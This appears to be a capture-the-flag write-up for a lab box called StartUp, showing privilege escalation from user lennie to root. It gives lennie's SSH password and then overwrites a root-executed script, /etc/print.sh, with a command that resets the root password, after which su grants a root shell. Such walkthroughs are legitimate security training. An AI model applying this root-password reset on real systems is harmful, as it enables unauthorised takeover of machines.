Skip to main content

StartUp

Privilege Escalation

Using SSH Credentials to Login: lennie:c4ntg3t3n0ughsp1c3

lennie@startup ~$ id
uid=1002(lennie) gid=1002(lennie) groups=1002(lennie)

There is a Script in the lennie Home Directory. The Script is Owned by ROOT.
We have Read - Write Access on the Script: /etc/print.sh

lennie@startup ~$ ls -l scripts/
total 8
-rwxr-xr-x 1 root root 77 Nov 12  2020 planner.sh
-rw-r--r-- 1 root root  1 Oct  7 08:43 startup_list.txt
lennie@startup ~$  cat scripts/planner.sh 
#!/bin/bash
echo $LIST > /home/lennie/scripts/startup_list.txt
/etc/print.sh

Modifying the Script to change ROOT Password

lennie@startup ~$ echo 'echo -e "password\npassword" | passwd root' > /etc/print.sh 

We can change the User from lennie ➜ root by using the Password: password

lennie@startup ~$ su -
Password: 
root@startup:~$ id
uid=0(root) gid=0(root) groups=0(root)

Privilege Escalation